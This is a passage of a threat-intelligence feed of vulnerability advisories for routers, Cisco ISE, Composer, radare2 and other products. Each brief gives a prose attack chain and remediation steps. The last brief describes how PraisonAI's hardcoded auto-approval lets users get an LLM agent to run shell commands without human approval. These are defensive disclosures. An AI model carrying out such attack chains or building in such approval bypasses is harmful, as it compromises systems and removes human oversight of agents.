is available, increasing the risk of widespread exploitation. Users are advised to upgrade to version 2026.04.16 to mitigate the risk. This vulnerability poses a significant threat due to the potential for complete system compromise, potentially leading to data exfiltration, device hijacking, or denial-of-service attacks.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a Wavlink WL-WN530H4 router running firmware version 20220721.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request targeting the \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e endpoint.\u003c/li\u003e\n\u003cli\u003eThe crafted request includes a payload designed to exploit the \u003ccode\u003estrcat/snprintf\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe vulnerable \u003ccode\u003estrcat/snprintf\u003c/code\u003e function fails to properly sanitize the attacker-controlled input.\u003c/li\u003e\n\u003cli\u003eThe unsanitized input is passed to a system call, resulting in OS command injection.\u003c/li\u003e\n\u003cli\u003eThe attacker executes arbitrary OS commands with the privileges of the web server process.\u003c/li\u003e\n\u003cli\u003eThe attacker can leverage the compromised system to perform actions such as modifying router configuration, installing malware, or pivoting to other network devices.\u003c/li\u003e\n\u003cli\u003eThe attacker gains persistent access and control over the router.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows a remote attacker to execute arbitrary OS commands on the affected Wavlink router. This can lead to a complete compromise of the device, allowing the attacker to modify router settings, intercept network traffic, or use the router as a launchpad for further attacks within the network. The lack of specifics regarding victimology suggests a wide potential impact affecting numerous users and potentially small businesses relying on these routers.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade the Wavlink WL-WN530H4 router to firmware version 2026.04.16 to patch CVE-2026-6483.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Wavlink Command Injection Attempt\u0026rdquo; to monitor for malicious requests targeting \u003ccode\u003e/cgi-bin/internet.cgi\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eMonitor web server logs for suspicious activity and unauthorized access attempts following exploitation of CVE-2026-6483.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T11:16:11Z","date_published":"2026-04-17T11:16:11Z","id":"/briefs/2026-04-wavlink-command-injection/","summary":"A remote command injection vulnerability exists in the Wavlink WL-WN530H4 router, specifically in the `strcat/snprintf` function of the `/cgi-bin/internet.cgi` file, allowing attackers to execute arbitrary OS commands.","title":"Wavlink WL-WN530H4 OS Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-wavlink-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.2,"id":"CVE-2026-23778"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve-2026-23778","command-injection","dell","powerprotect"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-23778 is a command injection vulnerability affecting Dell PowerProtect Data Domain appliances running Data Domain Operating System (DD OS). The affected versions include Feature Release versions 7.7.1.0 through 8.5, LTS2025 release version 8.3.1.0 through 8.3.1.20, and LTS2024 release versions 7.13.1.0 through 7.13.1.50. A remote attacker with high privileges could exploit this vulnerability to execute arbitrary commands with root privileges on the affected system. Successful exploitation would grant the attacker complete control over the Data Domain appliance, potentially leading to data loss, system compromise, and disruption of backup and recovery operations. Due to the critical role of Data Domain appliances in data protection, this vulnerability poses a significant risk to organizations using affected versions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains high-privileged remote access to the Dell PowerProtect Data Domain appliance, likely through compromised credentials or a separate vulnerability.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request containing a command injection payload targeting a vulnerable endpoint within the DD OS web management interface.\u003c/li\u003e\n\u003cli\u003eThe vulnerable endpoint fails to properly sanitize user-supplied input, allowing the attacker to inject arbitrary operating system commands into the system.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed with the privileges of the webserver process, which in this case, runs with root privileges.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the initial command execution to establish persistence on the system, such as creating a new user account or modifying system configuration files.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the gained root access to move laterally within the Data Domain appliance, potentially accessing sensitive data or compromising other services.\u003c/li\u003e\n\u003cli\u003eThe attacker could exfiltrate sensitive data, deploy ransomware, or disrupt backup operations depending on their objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-23778 grants a remote attacker complete control over the Dell PowerProtect Data Domain appliance. This can lead to severe consequences, including unauthorized access to sensitive data, data corruption, disruption of backup and recovery processes, and potential ransomware deployment. Given the Data Domain\u0026rsquo;s central role in data protection strategies, a successful attack can have a widespread impact, affecting numerous systems and applications that rely on the backup infrastructure.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the security update provided by Dell to patch CVE-2026-23778. Refer to the Dell security advisory for specific instructions: \u003ca href=\"https://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities\"\u003ehttps://www.dell.com/support/kbdoc/en-us/000450699/dsa-2026-060-security-update-for-dell-powerprotect-data-domain-multiple-vulnerabilities\u003c/a\u003e.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the blast radius of a potential compromise. Restrict network access to the Dell PowerProtect Data Domain appliance to only authorized users and systems.\u003c/li\u003e\n\u003cli\u003eReview user access controls and enforce the principle of least privilege. Ensure that users only have the necessary permissions to perform their job functions on the Data Domain appliance.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T09:16:05Z","date_published":"2026-04-17T09:16:05Z","id":"/briefs/2026-04-dell-powerprotect-cmd-injection/","summary":"A command injection vulnerability in Dell PowerProtect Data Domain (CVE-2026-23778) could allow a remote, high-privileged attacker to gain root-level access.","title":"Dell PowerProtect Data Domain Command Injection Vulnerability (CVE-2026-23778)","url":"https://feed.craftedsignal.io/briefs/2026-04-dell-powerprotect-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.9,"id":"CVE-2026-20186"},{"cvss":9.9,"id":"CVE-2026-20147"},{"cvss":9.9,"id":"CVE-2026-20180"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cisco-ise","rce","command-injection","path-traversal"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCisco Identity Services Engine (ISE) versions 3.x.x (3.1.0 - 3.4.0, and 3.1.0 p1-p10, 3.2.0 p1-p7, 3.3 Patches 1-7, and 3.4 Patches 1-3) are vulnerable to three newly disclosed vulnerabilities that can lead to remote code execution. These vulnerabilities, CVE-2026-20186, CVE-2026-20147, and CVE-2026-20180, can be exploited by remote attackers with low privileges, such as having Read Only Admin credentials. Successful exploitation can result in service disruption, system takeover, and complete compromise of the ISE instance. The vulnerabilities involve command injection and path traversal due to insufficient validation of user-supplied input in HTTP request handling. There is currently no public proof-of-concept or proof-of-exploitation available.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker authenticates to CISCO ISE with low-privilege credentials (e.g., Read Only Admin).\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious HTTP request targeting a vulnerable endpoint within the ISE web application.\u003c/li\u003e\n\u003cli\u003eThe crafted request exploits CVE-2026-20186 by injecting commands to escalate privileges to root.\u003c/li\u003e\n\u003cli\u003eAlternatively, the attacker exploits CVE-2026-20147 by sending a crafted HTTP request to execute arbitrary commands on the underlying operating system.\u003c/li\u003e\n\u003cli\u003eAs another option, the attacker leverages CVE-2026-20180 by exploiting insufficient validation of user-supplied input, leading to remote code execution.\u003c/li\u003e\n\u003cli\u003eThe injected commands or executed code elevates the attacker\u0026rsquo;s privileges to root.\u003c/li\u003e\n\u003cli\u003eThe attacker gains full control over the ISE system, enabling them to modify configurations, access sensitive data, or install malicious software.\u003c/li\u003e\n\u003cli\u003eIn single-node ISE deployments, successful exploitation can lead to a denial-of-service condition, disrupting network authentication and authorization services.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of these vulnerabilities allows attackers to gain complete control over the CISCO ISE system. This can lead to the compromise of sensitive network access policies, credentials, and other confidential information managed by ISE. The impact includes potential disruption of network services due to denial-of-service, unauthorized access to network resources, and the potential for lateral movement to other systems within the network. Given that ISE is a critical component for network access control, a successful attack can have widespread and severe consequences.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately patch vulnerable CISCO ISE instances to the latest version to remediate CVE-2026-20186, CVE-2026-20147, and CVE-2026-20180 (Cisco Security Advisory).\u003c/li\u003e\n\u003cli\u003eImplement enhanced monitoring and detection capabilities to identify suspicious activity related to these vulnerabilities (CCB Recommendation).\u003c/li\u003e\n\u003cli\u003eInvestigate and remediate any existing compromises by reviewing system logs and configurations for unauthorized changes (CCB Recommendation).\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-17T08:45:05Z","date_published":"2026-04-17T08:45:05Z","id":"/briefs/2026-04-cisco-ise-rce/","summary":"Multiple critical vulnerabilities in CISCO ISE (CVE-2026-20186, CVE-2026-20147, CVE-2026-20180) allow remote attackers with low privileges to execute arbitrary commands, potentially escalating privileges to root and causing denial-of-service.","title":"Multiple Critical Vulnerabilities in CISCO ISE Leading to Remote Code Execution","url":"https://feed.craftedsignal.io/briefs/2026-04-cisco-ise-rce/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.4,"id":"CVE-2026-41015"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["radare2","command-injection","cve-2026-41015","linux"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-41015 is a command injection vulnerability affecting radare2, a reverse engineering framework, when configured on UNIX systems without SSL. The vulnerability occurs in the \u003ccode\u003erabin2\u003c/code\u003e utility, specifically when processing Program Database (PDB) files with the \u003ccode\u003e-PP\u003c/code\u003e option. An attacker can inject arbitrary commands into the PDB name, which are then executed by the system. This vulnerability exists within a specific commit range after version 6.1.2 and before 6.1.3 (commit 9236f44). While radare2 encourages users to use the latest git version, the short timeframe of the vulnerable code increases the risk for users who have not updated within that period. Exploitation could lead to complete system compromise if the radare2 process has sufficient privileges.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker identifies a vulnerable radare2 installation configured on a UNIX system without SSL.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious PDB file name containing embedded OS commands.\u003c/li\u003e\n\u003cli\u003eAttacker supplies the crafted PDB file name as input to the \u003ccode\u003erabin2 -PP\u003c/code\u003e command.\u003c/li\u003e\n\u003cli\u003e\u003ccode\u003erabin2\u003c/code\u003e processes the PDB name without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe embedded OS commands within the PDB name are executed by the system.\u003c/li\u003e\n\u003cli\u003eAttacker gains arbitrary code execution within the context of the radare2 process.\u003c/li\u003e\n\u003cli\u003eAttacker leverages the initial access to escalate privileges.\u003c/li\u003e\n\u003cli\u003eAttacker performs malicious actions such as data exfiltration, system compromise, or denial of service.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-41015 allows an attacker to execute arbitrary commands on the affected system. This can lead to complete system compromise, including data theft, malware installation, or denial of service. The impact is particularly severe if radare2 is running with elevated privileges. The number of potential victims is dependent on the number of radare2 installations running vulnerable versions and configurations, but it is estimated to be relatively low due to the specific configuration requirements and the short lifespan of the vulnerable code in the git repository.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the patch from commit 9236f44 to remediate the command injection vulnerability in radare2.\u003c/li\u003e\n\u003cli\u003eAvoid configuring radare2 on UNIX systems without SSL to reduce the attack surface.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule \u003ccode\u003eradare2-suspicious-rabin2-execution\u003c/code\u003e to detect exploitation attempts involving the \u003ccode\u003erabin2\u003c/code\u003e command.\u003c/li\u003e\n\u003cli\u003eMonitor process execution for \u003ccode\u003erabin2\u003c/code\u003e with unusual command-line arguments as indicated by the rule \u003ccode\u003eradare2-rabin2-pdb-injection\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-16T03:16:27Z","date_published":"2026-04-16T03:16:27Z","id":"/briefs/2026-04-radare2-cmd-injection/","summary":"Radare2 before commit 9236f44, when configured on UNIX without SSL, is vulnerable to command injection via a PDB name passed to rabin2 -PP, potentially allowing arbitrary code execution.","title":"Radare2 Command Injection Vulnerability (CVE-2026-41015)","url":"https://feed.craftedsignal.io/briefs/2026-04-radare2-cmd-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-39808"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["cve","command-injection","fortinet"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eFortinet FortiSandbox versions 4.4.0 through 4.4.8 are susceptible to an OS Command Injection vulnerability identified as CVE-2026-39808. The vulnerability stems from an improper neutralization of special elements used in an OS command, potentially enabling attackers to inject and execute unauthorized code or commands on the affected system. The specifics of the attack vector are not detailed in the initial advisory. Successful exploitation could lead to complete system compromise, data theft, or denial-of-service conditions. Given the severity and potential for remote unauthenticated exploitation, this vulnerability poses a significant risk to organizations utilizing the affected FortiSandbox versions.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker identifies a vulnerable FortiSandbox instance running a version between 4.4.0 and 4.4.8.\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a malicious HTTP request containing OS command injection payloads within a vulnerable parameter (specific vector unknown).\u003c/li\u003e\n\u003cli\u003eThe FortiSandbox system processes the crafted request without proper sanitization or validation.\u003c/li\u003e\n\u003cli\u003eThe injected OS command is executed by the underlying operating system with the privileges of the FortiSandbox application.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages the command execution to install a reverse shell or other remote access tool.\u003c/li\u003e\n\u003cli\u003eThe attacker establishes a persistent connection to the compromised system.\u003c/li\u003e\n\u003cli\u003eThe attacker performs reconnaissance on the internal network.\u003c/li\u003e\n\u003cli\u003eThe attacker moves laterally to other systems, exfiltrates sensitive data, or deploys malicious software.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-39808 allows an unauthenticated attacker to execute arbitrary commands on the FortiSandbox appliance. This can lead to full system compromise, potentially enabling data exfiltration, installation of malware, or disruption of services. Given a CVSS score of 9.8, the vulnerability is considered critical. The lack of specific attack vector details in the initial advisory makes mitigation challenging without vendor patches or workarounds.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eMonitor web server logs for suspicious requests targeting FortiSandbox instances (category: \u003ccode\u003ewebserver\u003c/code\u003e, product: \u003ccode\u003elinux\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eApply available patches or upgrades from Fortinet to address CVE-2026-39808 as soon as they are released.\u003c/li\u003e\n\u003cli\u003eInspect network traffic for unusual outbound connections originating from FortiSandbox appliances (category: \u003ccode\u003enetwork_connection\u003c/code\u003e, product: \u003ccode\u003elinux\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eDeploy the provided Sigma rule to detect potential exploitation attempts based on common OS command injection patterns.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T12:00:00Z","date_published":"2026-04-15T12:00:00Z","id":"/briefs/2026-04-fortinet-os-command-injection/","summary":"Fortinet FortiSandbox versions 4.4.0 through 4.4.8 are vulnerable to OS Command Injection (CVE-2026-39808), potentially allowing unauthenticated attackers to execute arbitrary code or commands.","title":"Fortinet FortiSandbox OS Command Injection Vulnerability (CVE-2026-39808)","url":"https://feed.craftedsignal.io/briefs/2026-04-fortinet-os-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["composer","command-injection","php"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eComposer, a dependency manager for PHP, is susceptible to a command injection vulnerability (CVE-2026-40176) in versions 2.0.0 before 2.2.27 and versions 2.3.0 before 2.9.6. The vulnerability resides in the \u003ccode\u003ePerforce::generateP4Command()\u003c/code\u003e method, which improperly escapes user-supplied Perforce connection parameters (port, user, client) when constructing shell commands. This allows an attacker who controls a repository configuration, specifically within a malicious \u003ccode\u003ecomposer.json\u003c/code\u003e file declaring a Perforce VCS repository, to inject arbitrary commands. The injected commands are executed in the context of the user running Composer, even if Perforce is not installed. This vulnerability can be exploited if Composer is run on untrusted projects with attacker-supplied \u003ccode\u003ecomposer.json\u003c/code\u003e files.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker crafts a malicious \u003ccode\u003ecomposer.json\u003c/code\u003e file.\u003c/li\u003e\n\u003cli\u003eThe malicious \u003ccode\u003ecomposer.json\u003c/code\u003e declares a Perforce VCS repository.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ecomposer.json\u003c/code\u003e contains injected commands within the Perforce connection parameters (port, user, client).\u003c/li\u003e\n\u003cli\u003eA user unknowingly executes a Composer command (e.g., \u003ccode\u003ecomposer install\u003c/code\u003e) in a directory containing the malicious \u003ccode\u003ecomposer.json\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eComposer parses the \u003ccode\u003ecomposer.json\u003c/code\u003e and calls the \u003ccode\u003ePerforce::generateP4Command()\u003c/code\u003e method.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003ePerforce::generateP4Command()\u003c/code\u003e method constructs a shell command using the attacker-controlled, unescaped Perforce connection parameters.\u003c/li\u003e\n\u003cli\u003eComposer executes the injected command via \u003ccode\u003eproc_open\u003c/code\u003e or similar functions.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary command execution in the context of the user running Composer, potentially leading to sensitive information disclosure, system compromise, or further malicious activities.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of this vulnerability allows attackers to execute arbitrary commands on the victim\u0026rsquo;s system with the privileges of the user running Composer. This can lead to complete system compromise, data exfiltration, or denial of service. While the number of victims is currently unknown, any system running a vulnerable version of Composer and processing untrusted \u003ccode\u003ecomposer.json\u003c/code\u003e files is at risk. The primary attack vector involves tricking developers into running Composer on projects containing malicious \u003ccode\u003ecomposer.json\u003c/code\u003e files.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eUpgrade Composer to version 2.2.27 or 2.9.6 or later to patch CVE-2026-40176.\u003c/li\u003e\n\u003cli\u003eCarefully inspect \u003ccode\u003ecomposer.json\u003c/code\u003e files from untrusted sources before running Composer to verify Perforce-related fields contain valid values.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule to detect command execution with suspicious arguments when composer executes and tune for your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-15T12:00:00Z","date_published":"2026-04-15T12:00:00Z","id":"/briefs/2026-04-composer-command-injection/","summary":"Composer is vulnerable to command injection via a malicious Perforce repository due to improper escaping of user-supplied Perforce connection parameters, potentially leading to arbitrary command execution in the context of the user running Composer.","title":"Composer Command Injection via Malicious Perforce Repository","url":"https://feed.craftedsignal.io/briefs/2026-04-composer-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":7.8,"id":"CVE-2026-32183"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["high"],"_cs_tags":["command-injection","windows","vulnerability"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-32183 describes a command injection vulnerability affecting the Windows Snipping Tool. This vulnerability allows an attacker with local access to execute arbitrary code on a vulnerable system. The vulnerability stems from improper neutralization of special elements within commands processed by the Snipping Tool. While the specific attack vector is not detailed, the nature of command injection suggests that crafted input passed to the tool can be interpreted as commands, leading to unauthorized code execution. The vulnerability was reported on April 14, 2026, and further details can be found on the Microsoft Security Response Center website and the NVD entry for CVE-2026-32183. Exploitation requires user interaction.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains local access to a Windows system.\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing special elements designed for command injection.\u003c/li\u003e\n\u003cli\u003eAttacker opens the Windows Snipping Tool.\u003c/li\u003e\n\u003cli\u003eAttacker provides the malicious payload to the Snipping Tool, potentially via file name, or other input fields.\u003c/li\u003e\n\u003cli\u003eThe Snipping Tool processes the malicious payload without proper sanitization.\u003c/li\u003e\n\u003cli\u003eThe injected command is executed within the context of the Snipping Tool process.\u003c/li\u003e\n\u003cli\u003eThe attacker achieves arbitrary code execution on the system.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-32183 allows a local attacker to execute arbitrary code with the privileges of the Snipping Tool process. This could lead to complete system compromise, data theft, or denial of service. The vulnerability requires user interaction, reducing its overall severity. The number of potential victims is high due to the widespread use of the Windows Snipping Tool.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eApply the security update provided by Microsoft to address CVE-2026-32183, as referenced in the vulnerability details.\u003c/li\u003e\n\u003cli\u003eMonitor process execution for suspicious activity originating from the Snipping Tool (process_creation log source) after applying the patch.\u003c/li\u003e\n\u003cli\u003eEnable and review process creation logs (logsource: process_creation) for command line arguments containing suspicious characters or command injection attempts targeting the snipping tool executable.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-14T18:55:15Z","date_published":"2026-04-14T18:55:15Z","id":"/briefs/2026-04-snipping-tool-command-injection/","summary":"CVE-2026-32183 is a command injection vulnerability in the Windows Snipping Tool that allows a local attacker to execute arbitrary code.","title":"CVE-2026-32183: Windows Snipping Tool Command Injection Vulnerability","url":"https://feed.craftedsignal.io/briefs/2026-04-snipping-tool-command-injection/"},{"_cs_actors":[],"_cs_cves":[{"cvss":9.8,"id":"CVE-2026-22563"}],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["command-injection","unifi","cve-2026-22563"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003eCVE-2026-22563 describes a critical command injection vulnerability affecting UniFi Play PowerAmp (version 1.0.35 and earlier) and UniFi Play Audio Port (version 1.0.24 and earlier). The vulnerability stems from improper input validation, which allows an attacker with access to the UniFi Play network to inject arbitrary commands. Successful exploitation could lead to unauthorized access, system compromise, and potentially full control of the affected devices. This vulnerability was reported to HackerOne and assigned a CVSS v3.1 score of 9.8, indicating its severity. It is crucial for organizations using these UniFi Play devices to apply the recommended updates to mitigate this risk.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAttacker gains access to the UniFi Play network (e.g., through compromised credentials or network vulnerabilities).\u003c/li\u003e\n\u003cli\u003eAttacker identifies a vulnerable UniFi Play PowerAmp or Audio Port device running an affected software version (1.0.35 or earlier for PowerAmp, 1.0.24 or earlier for Audio Port).\u003c/li\u003e\n\u003cli\u003eAttacker crafts a malicious payload containing an injected command.\u003c/li\u003e\n\u003cli\u003eAttacker sends the malicious payload to the vulnerable device through a network request, exploiting the improper input validation vulnerability (CVE-2026-22563).\u003c/li\u003e\n\u003cli\u003eThe vulnerable device fails to properly sanitize the input, allowing the injected command to be executed by the underlying operating system.\u003c/li\u003e\n\u003cli\u003eThe injected command executes with the privileges of the UniFi Play application, potentially allowing the attacker to perform actions such as reading sensitive data, modifying system configurations, or installing malicious software.\u003c/li\u003e\n\u003cli\u003eAttacker establishes a reverse shell to maintain persistent access to the compromised device.\u003c/li\u003e\n\u003cli\u003eAttacker pivots to other devices in the network.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation of CVE-2026-22563 can lead to full system compromise of UniFi Play PowerAmp and Audio Port devices. An attacker could gain unauthorized access to sensitive data, disrupt audio services, or use the compromised devices as a foothold to pivot to other systems on the network. Given the high CVSS score of 9.8, the impact is considered critical. The specific number of affected devices and sectors remains unknown, but organizations utilizing UniFi Play devices are at risk.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImmediately update UniFi Play PowerAmp to version 1.0.38 or later and UniFi Play Audio Port to version 1.1.9 or later to patch CVE-2026-22563.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for suspicious activity originating from UniFi Play devices.\u003c/li\u003e\n\u003cli\u003eImplement network segmentation to limit the potential impact of a compromised device.\u003c/li\u003e\n\u003cli\u003eReview and enforce strong password policies to prevent unauthorized network access.\u003c/li\u003e\n\u003cli\u003eDeploy the Sigma rule for command injection attempts targeting UniFi Play devices (see below) to detect exploitation attempts in your environment.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2026-04-13T22:16:28Z","date_published":"2026-04-13T22:16:28Z","id":"/briefs/2026-04-unifi-command-injection/","summary":"A malicious actor with access to the UniFi Play network can exploit improper input validation vulnerabilities (CVE-2026-22563) in UniFi Play PowerAmp and Audio Port to inject commands, potentially leading to arbitrary code execution.","title":"UniFi Play Command Injection Vulnerability (CVE-2026-22563)","url":"https://feed.craftedsignal.io/briefs/2026-04-unifi-command-injection/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":[],"_cs_severities":["critical"],"_cs_tags":["rce","command-injection","praisonai"],"_cs_type":"advisory","_cs_vendors":[],"content_html":"\u003cp\u003ePraisonAI is vulnerable to remote code execution due to a misconfiguration in the Chainlit UI modules (\u003ccode\u003echat.py\u003c/code\u003e and \u003ccode\u003ecode.py\u003c/code\u003e). Specifically, the application hardcodes \u003ccode\u003econfig.approval_mode = \u0026quot;auto\u0026quot;\u003c/code\u003e, effectively disabling the intended human-in-the-loop approval mechanism for ACP tool executions, even when administrators configure the application to require manual approval. This override occurs after the application loads administrator configurations from the \u003ccode\u003ePRAISON_APPROVAL_MODE\u003c/code\u003e environment variable. Consequently, an authenticated user, including those using default credentials, can instruct the LLM agent to execute arbitrary single-command shell operations on the server without any approval prompt, subject only to the PraisonAI process’s OS-level permissions. The vulnerability affects PraisonAI versions prior to 4.5.128.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eAn attacker authenticates to the PraisonAI UI using valid credentials (default admin/admin if unchanged).\u003c/li\u003e\n\u003cli\u003eThe attacker crafts a chat message that instructs the LLM agent to execute a shell command via the \u003ccode\u003eacp_execute_command\u003c/code\u003e function.\u003c/li\u003e\n\u003cli\u003eThe LLM agent parses the message and prepares the command for execution.\u003c/li\u003e\n\u003cli\u003eDue to the hardcoded \u003ccode\u003eapproval_mode = \u0026quot;auto\u0026quot;\u003c/code\u003e in \u003ccode\u003echat.py\u003c/code\u003e or \u003ccode\u003ecode.py\u003c/code\u003e, the command bypasses the intended approval process in \u003ccode\u003eagent_tools.py\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe \u003ccode\u003esubprocess.run()\u003c/code\u003e function in \u003ccode\u003eaction_orchestrator.py\u003c/code\u003e executes the attacker-controlled command with \u003ccode\u003eshell=True\u003c/code\u003e.\u003c/li\u003e\n\u003cli\u003eThe command executes with the permissions of the PraisonAI process.\u003c/li\u003e\n\u003cli\u003eThe result of the command execution is returned to the attacker via the chat interface.\u003c/li\u003e\n\u003cli\u003eThe attacker leverages this vulnerability to achieve code execution, data exfiltration, or other malicious objectives.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful exploitation allows an authenticated user to execute arbitrary shell commands on the server hosting PraisonAI. This can lead to:\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eConfidentiality breach:\u003c/strong\u003e Read sensitive files accessible to the process (e.g., \u003ccode\u003e/etc/passwd\u003c/code\u003e, application secrets).\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eIntegrity compromise:\u003c/strong\u003e Modify or delete files, install backdoors.\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eAvailability impact:\u003c/strong\u003e Kill processes, consume resources, 